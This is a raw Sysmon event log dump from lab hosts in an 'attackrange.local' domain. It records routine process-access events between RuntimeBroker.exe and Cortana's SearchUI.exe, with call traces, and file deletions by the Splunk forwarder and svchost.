08:05:37.325{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x8000000000000000810018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:38.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22BBB800026FDE5E8C11A5893A99B7AD,SHA256=97C09DC5237C7269E129873FFD25D3ED798CAF57BC94C3058A69D7D3E5724910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.660{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A33A48CB3C1622D8D40EBD18B0D9B251,SHA256=BE38A361CD09B8D250E7296313ABD3E094567BDAE197A0E2AE1B667BFAAA045C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428D670E4C2038D0318BC746CAF685A0,SHA256=D3314AF41F83E1F47D11C24AF8277887E0C9A7EF9F6A6E28A4756F7BEE00F586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99E025462A547F9C5C20E6685E17497C,SHA256=E7EA4F969AAF1D92C2A5F844902F768F0F5235ECBD414FA2963BFEA6DA04B5AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x8000000000000000810019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:39.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 